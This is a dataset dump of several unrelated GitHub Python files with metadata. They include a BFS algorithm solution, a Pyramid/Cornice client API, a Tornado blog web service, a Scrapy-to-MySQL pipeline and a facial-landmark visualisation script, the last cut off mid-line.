25, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "BrainDataAnalysis.ploting_functions.generate_labels_dict_from_cluster_info_dataframe", "line_number": 34, "usage_type": "call"}, {"api_name": "BrainDataAnalysis.ploting_functions", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.size", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "t_sne_bhcuda.tsne_cluster.create_cluster_info_from_kilosort_spike_templates", "line_number": 81, "usage_type": "call"}, {"api_name": "t_sne_bhcuda.tsne_cluster", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "BrainDataAnalysis.ploting_functions.generate_labels_dict_from_cluster_info_dataframe", "line_number": 83, "usage_type": "call"}, {"api_name": "BrainDataAnalysis.ploting_functions", "line_number": 83, "usage_type": "name"}, {"api_name": "spikesorting_tsne.io_with_cpp.load_tsne_result", "line_number": 86, "usage_type": "call"}, {"api_name": "spikesorting_tsne.io_with_cpp", "line_number": 86, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "5698820326", "text": "# Baekjoon Online Judge - 1303번. 전쟁 - 전투\n\nfrom collections import deque\n\nN, M = map(int, input().split())\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\nwar = [list(input()) for _ in range(M)]\nvisited = [[False] * N for _ in range(M)]\nresult = {'W': 0, 'B': 0}\nfor i in range(M):\n for j in range(N):\n if not visited[i][j]:\n visited[i][j] = True\n q = deque()\n q.append((i, j))\n cnt = 1\n color = war[i][j]\n while q:\n x, y = q.popleft()\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if nx < 0 or nx >= M or ny < 0 or ny >= N:\n continue\n if not visited[nx][ny] and war[nx][ny] == color:\n cnt += 1\n visited[nx][ny] = True\n q.append((nx, ny))\n result[color] += (cnt * cnt)\nprint(*result.values())\n", "repo_name": "wnstj-yang/Algorithm", "sub_path": "BOJ/BOJ_1303.py", "file_name": "BOJ_1303.py", "file_ext": "py", "file_size_in_byte": 984, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "7883234831", "text": "from pyramid.security import (\n authenticated_userid,\n Allow,\n)\n\nfrom cornice.resource import resource, view\nfrom cornice.validators import (\n colander_body_validator,\n colander_path_validator,\n colander_validator,\n)\n\nfrom sqlalchemy import func\n\nfrom cw.database import User, Admin, Client, UserRole, UserType\nfrom cw.modules.security import hash_password\n\nfrom .schema import (\n CreateClientSchema,\n GetClientSchema,\n GetClientsSchema,\n UpdateClientValidatorSchema,\n)\n\nfrom .response_schema import (\n ResponseBodyClientSchema,\n ResponseBodyClientsSchema,\n)\n\nfrom .._shared.query import (\n apply_filter_sort_range_for_query,\n generate_range,\n)\n\nfrom .._shared.schema import (\n map_data_to_body_schema\n)\n\nfrom cw.modules.cornice import negotiation_params\n\n\n@resource(path=\"/client/{id}\", collection_path=\"/client\", description=\"Client resource\",\n tags=[\"client\"], **negotiation_params)\nclass ClientResource(object):\n def __init__(self, request, context=None):\n self.request = request\n\n def __acl__(self):\n return [\n (Allow, UserRole.admin, (\"get\", \"create\", \"update\",)),\n (Allow, UserRole.psychologist, (\"get\", \"create\", \"update\",)),\n ]\n\n @view(\n schema=GetClientSchema(),\n validators=(colander_path_validator,),\n response_schemas={\n '200': ResponseBodyClientSchema(description=\"Return OK response\"),\n },\n permission=\"get\",\n )\n def get(self):\n path_data = self.request.validated\n user = self.request.db.query(User).get(path_data['id'])\n user = dict(user)\n return map_data_to_body_schema(ResponseBodyClientSchema, user)\n\n @view(\n schema=GetClientsSchema(),\n validators=(colander_validator,),\n response_schemas={\n '200': ResponseBodyClientsSchema(description=\"Return OK response\"),\n },\n permission=\"get\",\n renderer='json'\n )\n def collection_get(self):\n data = self.request.validated['querystring']\n apply_range = True\n if data[\"filter\"].pop(\"no_range\", None):\n apply_range = False\n\n filter_for_client = (User.type == UserType.client) # noqa: E711\n users_query = self.request.db.query(User).with_polymorphic([Client]) \\\n .filter(filter_for_client)\n users_count_query = self.request.db.query(func.count(User.id)).filter(filter_for_client)\n users_query, users_count_query = apply_filter_sort_range_for_query(User, users_query, users_count_query,\n data=data, apply_range=apply_range)\n\n users = users_query.all()\n users_count = users_count_query.scalar()\n\n users = [dict(u) for u in users]\n\n if data.get(\"range\"):\n self.request.response.headers.add(\n \"Content-Range\",\n generate_range(data[\"range\"] if apply_range else False, users_count)\n )\n\n return map_data_to_body_schema(ResponseBodyClientsSchema, users)\n\n @view(\n schema=UpdateClientValidatorSchema(),\n validators=(colander_validator,),\n response_schemas={\n '200': ResponseBodyClientSchema(description=\"return OK response\")\n },\n permission=\"update\",\n )\n def put(self):\n body_data = self.request.validated[\"body\"]\n path_data = self.request.validated[\"path\"]\n\n user = self.request.db.query(Client).get(path_data[\"id\"])\n\n for key in body_data:\n if body_data[key] is None:\n continue\n setattr(user, key, body_data[key])\n\n self.request.db.flush()\n\n user = dict(user)\n\n return map_data_to_body_schema(ResponseBodyClientSchema, user)\n\n @view(\n schema=CreateClientSchema(),\n validators=(colander_body_validator,),\n response_schemas={\n '200': ResponseBodyClientSchema(description=\"return OK response\")\n },\n permission=\"create\",\n )\n def collection_post(self):\n manager_data = {**self.request.validated}\n manager_data[\"password\"] = hash_password(manager_data[\"password\"])\n user = Client(\n **manager_data,\n created_by=authenticated_userid(self.request)\n )\n self.request.db.add(user)\n self.request.db.flush()\n\n user = dict(user)\n\n return map_data_to_body_schema(ResponseBodyClientSchema, user)\n", "repo_name": "Eger37/course_work", "sub_path": "backend/cw/resources/client/resource.py", "file_name": "resource.py", "file_ext": "py", "file_size_in_byte": 4479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyramid.security.Allow", "line_number": 50, "usage_type": "name"}, {"api_name": "cw.database.UserRole.admin", "line_number": 50, "usage_type": "attribute"}, {"api_name": "cw.database.UserRole", "line_number": 50, "usage_type": "name"}, {"api_name": "pyramid.security.Allow", "line_number": 51, "usage_type": "name"}, {"api_name": "cw.database.UserRole.psychologist", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cw.database.UserRole", "line_number": 51, "usage_type": "name"}, {"api_name": "cw.database.User", "line_number": 64, "usage_type": "argument"}, {"api_name": "_shared.schema.map_data_to_body_schema", "line_number": 66, "usage_type": "call"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 66, "usage_type": "argument"}, {"api_name": "cornice.resource.view", "line_number": 54, "usage_type": "call"}, {"api_name": "schema.GetClientSchema", "line_number": 55, "usage_type": "call"}, {"api_name": "cornice.validators.colander_path_validator", "line_number": 56, "usage_type": "name"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 58, "usage_type": "call"}, {"api_name": "cw.database.User.type", "line_number": 83, "usage_type": "attribute"}, {"api_name": "cw.database.User", "line_number": 83, "usage_type": "name"}, {"api_name": "cw.database.UserType.client", "line_number": 83, "usage_type": "attribute"}, {"api_name": "cw.database.UserType", "line_number": 83, "usage_type": "name"}, {"api_name": "cw.database.User", "line_number": 84, "usage_type": "argument"}, {"api_name": "cw.database.Client", "line_number": 84, "usage_type": "name"}, {"api_name": "sqlalchemy.func.count", "line_number": 86, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 86, "usage_type": "name"}, {"api_name": "cw.database.User.id", "line_number": 86, "usage_type": "attribute"}, {"api_name": "cw.database.User", "line_number": 86, "usage_type": "name"}, {"api_name": "_shared.query.apply_filter_sort_range_for_query", "line_number": 87, "usage_type": "call"}, {"api_name": "cw.database.User", "line_number": 87, "usage_type": "argument"}, {"api_name": "_shared.query.generate_range", "line_number": 98, "usage_type": "call"}, {"api_name": "_shared.schema.map_data_to_body_schema", "line_number": 101, "usage_type": "call"}, {"api_name": "response_schema.ResponseBodyClientsSchema", "line_number": 101, "usage_type": "argument"}, {"api_name": "cornice.resource.view", "line_number": 68, "usage_type": "call"}, {"api_name": "schema.GetClientsSchema", "line_number": 69, "usage_type": "call"}, {"api_name": "cornice.validators.colander_validator", "line_number": 70, "usage_type": "name"}, {"api_name": "response_schema.ResponseBodyClientsSchema", "line_number": 72, "usage_type": "call"}, {"api_name": "cw.database.Client", "line_number": 115, "usage_type": "argument"}, {"api_name": "_shared.schema.map_data_to_body_schema", "line_number": 126, "usage_type": "call"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 126, "usage_type": "argument"}, {"api_name": "cornice.resource.view", "line_number": 103, "usage_type": "call"}, {"api_name": "schema.UpdateClientValidatorSchema", "line_number": 104, "usage_type": "call"}, {"api_name": "cornice.validators.colander_validator", "line_number": 105, "usage_type": "name"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 107, "usage_type": "call"}, {"api_name": "cw.modules.security.hash_password", "line_number": 138, "usage_type": "call"}, {"api_name": "cw.database.Client", "line_number": 139, "usage_type": "call"}, {"api_name": "pyramid.security.authenticated_userid", "line_number": 141, "usage_type": "call"}, {"api_name": "_shared.schema.map_data_to_body_schema", "line_number": 148, "usage_type": "call"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 148, "usage_type": "argument"}, {"api_name": "cornice.resource.view", "line_number": 128, "usage_type": "call"}, {"api_name": "schema.CreateClientSchema", "line_number": 129, "usage_type": "call"}, {"api_name": "cornice.validators.colander_body_validator", "line_number": 130, "usage_type": "name"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 132, "usage_type": "call"}, {"api_name": "cornice.resource.resource", "line_number": 42, "usage_type": "call"}, {"api_name": "cw.modules.cornice.negotiation_params", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "43624622045", "text": "# -*- coding: utf-8 -*-\nimport json\nfrom operator import attrgetter\n\nfrom webservice.base import APIHandler\nfrom webservice.tasks.email_tasks import send_email_task\nfrom config import SETTINGS\nfrom models import *\n\nclass DiaryListHandler(APIHandler):\n def get(self, page_num):\n \"\"\"Diary List handler.\n Also support paging.\n\n Args:\n page_num: int\n\n Return:\n diaries: json\n \"\"\"\n diaries = Diary.objects.order_by('-publish_time')[(int(page_num) - 1)*10\n :int(page_num) * 10]\n d = diaries.to_json()\n self.finish(d)\n\n\nclass DiaryDetailHandler(APIHandler):\n def get(self, diary_id):\n \"\"\"Diary Detail handler.\n\n Args:\n diary_id: ObjectID\n\n Return:\n diary: json\n \"\"\"\n diary = Diary.objects(pk=diary_id).first()\n\n d = diary.to_json()\n self.finish(d)\n\n\nclass CategoryListHandler(APIHandler):\n def get(self):\n \"\"\"Category List handler.\n\n Args:\n none\n\n Return:\n categories: json\n \"\"\"\n categories = Category.objects.order_by('-publish_time')\n\n d = categories.to_json()\n self.finish(d)\n\n\nclass CategoryDetailHandler(APIHandler):\n def get(self, category_id):\n \"\"\"Category Detail handler.\n\n Args:\n category_id: ObjectID\n\n Return:\n category: json\n \"\"\"\n category = Category.objects(pk=category_id).first()\n\n category_json = json.loads(category.to_json())\n\n diaries = []\n\n for c in category_json['diaries']:\n diary = Diary.objects(pk=c['$oid']).first()\n\n diaries.append(json.loads(diary.to_json()))\n\n category_json['diaries'] = diaries\n\n d = category_json\n\n self.finish(d)\n\n\nclass TaglListlHandler(APIHandler):\n def get(self):\n \"\"\"Tag List handler.\n\n Args:\n none\n\n Return:\n tags: json\n \"\"\"\n tags = Tag.objects.order_by('-publish_time')\n\n d = tags.to_json()\n self.finish(d)\n\n\nclass TagDetailHandler(APIHandler):\n def get(self, tag_name):\n \"\"\"Tag Detail handler.\n\n Args:\n tag_name: String\n\n Return:\n tag: json\n \"\"\"\n tag = Tag.objects(name=tag_name).first()\n\n d = tag.to_json()\n self.finish(d)\n\n\nclass GalleryListHandler(APIHandler):\n def get(self):\n \"\"\"Gallery List handler.\n\n Args:\n none\n\n Return:\n gallery: json\n \"\"\"\n albums = Gallery.objects.order_by('-publish_time')\n\n d = albums.to_json()\n self.finish(d)\n\n\nclass GalleryDetailHandler(APIHandler):\n def get(self, gallery_id):\n \"\"\"Gallery Detail handler.\n\n Args:\n gallery_id: ObjectID\n\n Return:\n gallery: json\n \"\"\"\n gallery = Gallery.objects(pk=gallery_id).first()\n\n d = gallery.to_json()\n self.finish(d)\n\n\nclass UserProfileHandler(APIHandler):\n def get(self):\n \"\"\"User handler.\n Get all user profile except hashed password.\n\n Args:\n none\n\n Return:\n profile: json\n \"\"\"\n user = User.objects().first()\n\n d = json.loads(user.to_json())\n del d['password']\n\n self.finish(d)\n\n\nclass CommentAddHandler(APIHandler):\n \"\"\" Comment Add AJAX Post Action.\n\n designed for ajax post and send reply email for admin\n\n Args:\n username: guest_name\n did: diary ObjectedId\n email: guest_email\n content: comment content\n\n Return:\n email_status: success\n \"\"\"\n def get(self, *args):\n did = self.get_argument('did')\n name = self.get_argument('username')\n email = self.get_argument('email')\n content = self.get_argument('comment')\n\n\n diary = Diary.objects(pk=did)\n diary_title = diary[0].title\n\n commentEm = CommentEm(\n author = name,\n content = content,\n email = email\n )\n diary.update_one(push__comments=commentEm)\n\n comment = Comment(content=content)\n comment.diary = diary[0]\n comment.email = email\n comment.author = name\n comment.save(validate=False)\n\n try:\n send_email_task(SETTINGS['EMAIL'],\n SETTINGS['MAIN_TITLE'] + u'收到了新的评论, 请查收',\n content, did, name, diary_title)\n\n response = json.dumps({'success': 'true'})\n self.finish(response)\n except Exception as e:\n return str(e)\n\n", "repo_name": "ScenK/Dev_Blog_Webservice", "sub_path": "webservice/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 4732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "61", "api": [{"api_name": "webservice.base.APIHandler", "line_number": 10, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 27, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 43, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 59, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 78, "usage_type": "call"}, {"api_name": "webservice.base.APIHandler", "line_number": 87, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 103, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 119, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 135, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 151, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 164, "usage_type": "call"}, {"api_name": "webservice.base.APIHandler", "line_number": 170, "usage_type": "name"}, {"api_name": "webservice.tasks.email_tasks.send_email_task", "line_number": 208, "usage_type": "call"}, {"api_name": "config.SETTINGS", "line_number": 208, "usage_type": "name"}, {"api_name": "config.SETTINGS", "line_number": 209, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 212, "usage_type": "call"}]} +{"seq_id": "31006630974", "text": "# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nimport os\nimport datetime\nimport pymysql\nfrom spider.items import *\nfrom spider.util import *\nimport logging\nimport scrapy\nimport time\nfrom scrapy.pipelines.images import ImagesPipeline\n\n\n# see: https://www.osgeo.cn/scrapy/topics/media-pipeline.html\nclass MinioPipeline(ImagesPipeline):\n\n def get_media_requests(self, item, info):\n if item.get('image_url'):\n return scrapy.Request(url=item[\"image_url\"])\n\n def item_completed(self, results, item, info):\n image_paths = [x[\"path\"] for ok, x in results if ok]\n if image_paths:\n item[\"image_url\"] = image_paths[0]\n return item\n\n def file_path(self, request, response=None, info=None, *, item=None):\n return parse_img_url(request.url)\n\n\nclass ProductPipeline:\n\n def __init__(self, db_host, db_port, db_user, db_pwd, db_name):\n self.sub_dir = datetime.date.today().strftime('%Y%m%d')\n self.db_host = db_host\n self.db_port = db_port\n self.db_user = db_user\n self.db_pwd = db_pwd\n self.db_name = db_name\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(\n db_host=os.environ.get(\"CHAT_DB_HOST\", \"127.0.0.1\"),\n db_pwd=os.environ.get(\"CHAT_DB_PWD\", \"root\"),\n db_name=os.environ.get(\"MYSQL_DB_NAME\", \"mall_pms\"),\n db_port=os.environ.get(\"CHAT_DB_PORT\", \"3306\"),\n db_user=os.environ.get(\"CHAT_DB_USER\", \"root\")\n )\n\n def open_spider(self, spider):\n self.db = pymysql.connect(\n host=self.db_host,\n user=self.db_user,\n password=self.db_pwd,\n db=self.db_name,\n charset=\"utf8mb4\",\n cursorclass=pymysql.cursors.DictCursor,\n )\n self.cursor = self.db.cursor()\n\n def close_spider(self, spider):\n self.db.close()\n\n def process_item(self, item, spider):\n try:\n if isinstance(item, CatItem):\n item['is_release'] = 1\n self.send_db(item, 'pms_category', item['id'])\n elif isinstance(item, AttrGroupItem):\n self.send_db(item, 'pms_attr_group', item['id'])\n elif isinstance(item, AttrItem):\n item['is_release'] = 1\n item['type'] = 1\n item['created_at'] = int(time.time())\n item['updated_at'] = int(time.time())\n self.send_db(item, 'pms_attr', item['id'])\n elif isinstance(item, SpuItem):\n item['weight'] = 100\n item['created_at'] = int(time.time())\n item['updated_at'] = int(time.time())\n self.send_db(item, 'pms_spu', item['id'])\n elif isinstance(item, BrandItem):\n item['created_at'] = int(time.time())\n item['updated_at'] = int(time.time())\n item['logo'] = parse_img_url(item['logo'])\n item['cover'] = parse_img_url(item['cover'])\n item['is_release'] = 1\n self.send_db(item, 'pms_brand', item['id'])\n elif isinstance(item, SkuItem):\n item['cover'] = parse_img_url(item['cover'])\n self.send_db(item, 'pms_sku', item['id'])\n elif isinstance(item, AttrValueItem):\n sql = 'select * from pms_attr_value where spu_id=%s and `attr_id`=%s' % (\n item['spu_id'], item['attr_id'])\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_attr_value')\n elif isinstance(item, SpuImageItem):\n item['img'] = parse_img_url(item['img'])\n sql = 'select * from pms_spu_image where spu_id=%s and `img`=\"%s\"' % (item['spu_id'], item['img'])\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_spu_image')\n elif isinstance(item, SkuImageItem):\n item['img'] = parse_img_url(item['img'])\n sql = 'select * from pms_sku_image where sku_id=%s and `img`=\"%s\"' % (item['sku_id'], item['img'])\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_sku_image')\n elif isinstance(item, SkuAttrItem):\n sql = 'select * from pms_sku_attr where sku_id=%s and `attr_id`=%s' % (item['sku_id'], item['attr_id'])\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_sku_attr')\n elif isinstance(item, SpuDescItem):\n sql = 'select * from pms_spu_desc where spu_id=%s' % item['spu_id']\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_spu_desc')\n elif isinstance(item, AttrRelGroupItem):\n sql = 'select * from pms_attr_rel_group where attr_id=%s and group_id=%s' % (\n item['attr_id'], item['group_id'])\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_attr_rel_group')\n else:\n return\n except Exception as e:\n logging.error(item)\n logging.error(e)\n return item\n\n def send_db(self, item, table, pri_id, key='id'):\n sql = 'select * from %s where %s = %s' % (table, key, pri_id)\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n return self.save_db(item, table)\n\n def save_db(self, item, table):\n keys = item.keys()\n values = tuple(item.values())\n fields = \",\".join(['`' + v + '`' for v in keys])\n temp = \",\".join([\"%s\"] * len(keys))\n sql = \"INSERT INTO {} ({}) VALUES ({})\".format(table, fields, temp)\n self.cursor.execute(sql, values)\n return self.db.commit()\n", "repo_name": "binbinly/micro-mall", "sub_path": "seed/spider/spider/pipelines.py", "file_name": "pipelines.py", "file_ext": "py", "file_size_in_byte": 6209, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.pipelines.images.ImagesPipeline", "line_number": 20, "usage_type": "name"}, {"api_name": "scrapy.Request", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 49, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 50, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 51, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 52, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 53, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 57, "usage_type": "call"}, {"api_name": "pymysql.cursors", "line_number": 63, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 85, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "time.time", "line_number": 89, "usage_type": "call"}, {"api_name": "time.time", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 135, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 136, "usage_type": "call"}]} +{"seq_id": "11427057092", "text": "import os\nimport h5py\nimport torch\nimport argparse\nimport numpy as np\nimport torch.backends.cudnn as cudnn\nfrom end2end.run_all import E2E, load_pdm, load_hg\nfrom datasets.facial_landmarks import FaceLandmarksEasyTestData, FaceLandmarksHardTestData, FaceLandmarksTrainingData\nfrom torchvision import transforms\nfrom common.transforms import ImageTransform\nfrom torch.utils.data.dataloader import DataLoader\nimport cv2\nfrom tools.visualize_predictions import draw_landmarks, add_description, gallery, add_border\nfrom common.util import mkdir_if_not_exists\nimport json\n\nCOLOR_GT = [255,36,255][::-1]\nCOLOR_HG = [117,206,255][::-1]\nCOLOR_PDM = [36,255,36][::-1]\n\n\ndef sample_mse(predictions, gts):\n return [np.mean((predictions[i] - gts[i]) ** 2) for i in range(gts.shape[0])]\n\n\ndef get_improvements(hg_pred, pdm_pred, gt):\n sample_losses_pdm = sample_mse(pdm_pred.detach().cpu().numpy(), gt.detach().cpu().numpy())\n sample_losses_hg = sample_mse(hg_pred.detach().cpu().numpy(), gt.detach().cpu().numpy())\n improvements = [(i, sample_losses_hg[i], sample_losses_pdm[i], sample_losses_hg[i] / sample_losses_pdm[i]) for i in range(len(sample_losses_hg))]\n sorted_improvements = sorted(improvements, key=lambda x: x[3])\n return sorted_improvements\n\n\ndef plot_best_improvements(hg_pred, pdm_pred, gt, images, target, n=10):\n mkdir_if_not_exists(target)\n improvements = get_improvements(hg_pred, pdm_pred, gt)[-n:]\n all_imgs = []\n all_imgs_desc = []\n for rank, (i, hg_err, pdm_err, ratio) in enumerate(improvements[::-1]):\n print(target, i, hg_err, pdm_err, ratio)\n gt_img = draw_landmarks(cv2.cvtColor(images[i], cv2.COLOR_RGB2BGR), gt[i], color=COLOR_GT, size=1)\n cv2.imwrite(os.path.join(target, \"%d_%d_gt_%0.4f_plain.png\" % (rank, i, ratio)), gt_img)\n gt_img_desc = add_description(gt_img, \"GT\")\n cv2.imwrite(os.path.join(target, \"%d_%d_gt_%0.4f_desc.png\" % (rank, i, ratio)), gt_img_desc)\n\n hg_img = draw_landmarks(cv2.cvtColor(images[i], cv2.COLOR_RGB2BGR), hg_pred[i], color=COLOR_HG, size=1)\n cv2.imwrite(os.path.join(target, \"%d_%d_hg_%0.4f_plain.png\" % (rank, i, ratio)), hg_img)\n hg_img_desc = add_description(hg_img, \"HG %0.6f\" % hg_err)\n cv2.imwrite(os.path.join(target, \"%d_%d_hg_%0.4f_desc.png\" % (rank, i, ratio)), hg_img_desc)\n\n pdm_img = draw_landmarks(cv2.cvtColor(images[i], cv2.COLOR_RGB2BGR), pdm_pred[i], color=COLOR_PDM, size=1)\n cv2.imwrite(os.path.join(target, \"%d_%d_pdm_%0.4f_plain.png\" % (rank, i, ratio)), pdm_img)\n pdm_img_desc = add_description(pdm_img, \"PDM %0.6f\" % pdm_err)\n cv2.imwrite(os.path.join(target, \"%d_%d_pdm_%0.4f_desc.png\" % (rank, i, ratio)), pdm_img_desc)\n\n gal_input = [add_border(x, 5) for x in [gt_img, hg_img, pdm_img]]\n cur_all = gallery(np.array(gal_input), 1)\n cv2.imwrite(os.path.join(target, \"%d_%d_all_%0.4f.png\" % (rank, i, ratio)), cur_all)\n\n gal_input_desc = [add_border(x, 5) for x in [gt_img_desc, hg_img_desc, pdm_img_desc]]\n cur_all_desc = gallery(np.array(gal_input_desc), 1)\n cv2.imwrite(os.path.join(target, \"%d_%d_all_desc_%0.4f.png\" % (rank, i, ratio)), cur_all_desc)\n\n all_imgs.append(cur_all)\n all_imgs_desc.append(add_description(cur_all_desc, \" impr. %0.4f\" % ratio))\n\n all_imgs = gallery(np.array(all_imgs), len(all_imgs))\n cv2.imwrite(os.path.join(target, \"gallery.png\"), all_imgs)\n\n all_imgs_desc = gallery(np.array(all_imgs_desc), len(all_imgs_desc))\n cv2.imwrite(os.path.join(target, \"gallery_desc.png\"), all_imgs_desc)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"hg\", type=str, help=\"Path to pretrained hourglass (.torch)\")\n parser.add_argument(\"pdm\", type=str, help=\"Path to pretrained PDM (.torch)\")\n parser.add_argument(\"data\", type=str, help=\"all_data_valid_w_profile_pts.h5\")\n parser.add_argument(\"target\", type=str, help=\"Where to store\")\n parser.add_argument(\"--gpu\", type=int, default=0, help=\"GPU ID\")\n parser.add_argument(\"--n\", type=int, default=10, help=\"N biggest improvements\")\n args = parser.parse_args()\n\n mkdir_if_not_exists(args.target)\n\n gpu_id = args.gpu\n location = 'cpu' if gpu_id < 0 else \"cuda:%d\" % gpu_id\n\n hg, hg_config = load_hg(args.hg, location)\n pdm, pdm_config = load_pdm(args.pdm, location)\n pdm.print_losses = False\n #pdm.test_epochs = 100\n\n torch.autograd.set_detect_anomaly(True) # This makes debugging much easier\n\n if location is not 'cpu':\n torch.cuda.set_device(torch.device(location))\n\n normMean, normStd = FaceLandmarksTrainingData.TRAIN_MEAN, FaceLandmarksTrainingData.TRAIN_STD\n normTransform = transforms.Normalize(normMean, normStd)\n\n transform = transforms.Compose([\n ImageTransform(transforms.ToPILImage()),\n ImageTransform(transforms.ToTensor()),\n ImageTransform(normTransform)\n ])\n\n pin_memory = location != 'cpu'\n num_workers = 8\n\n with h5py.File(args.data, 'r') as f:\n easy_d = FaceLandmarksEasyTestData(f, transform=transform)\n hard_d = FaceLandmarksHardTestData(f, transform=transform)\n\n e2e = E2E(hg, pdm, 64, max(len(easy_d), len(hard_d)))\n\n easy = list(DataLoader(dataset=easy_d, shuffle=False, num_workers=num_workers, pin_memory=pin_memory, batch_size=len(easy_d)))[0]\n hard = list(DataLoader(dataset=hard_d, shuffle=False, num_workers=num_workers, pin_memory=pin_memory, batch_size=len(hard_d)))[0]\n\n easy_gt = easy[\"landmarks\"]\n easy_images = easy[\"image\"]\n hard_gt = hard[\"landmarks\"]\n hard_images = hard[\"image\"]\n\n with torch.no_grad():\n easy_pdm, easy_hg, pdm_3d_easy, pdm_affparam_easy = 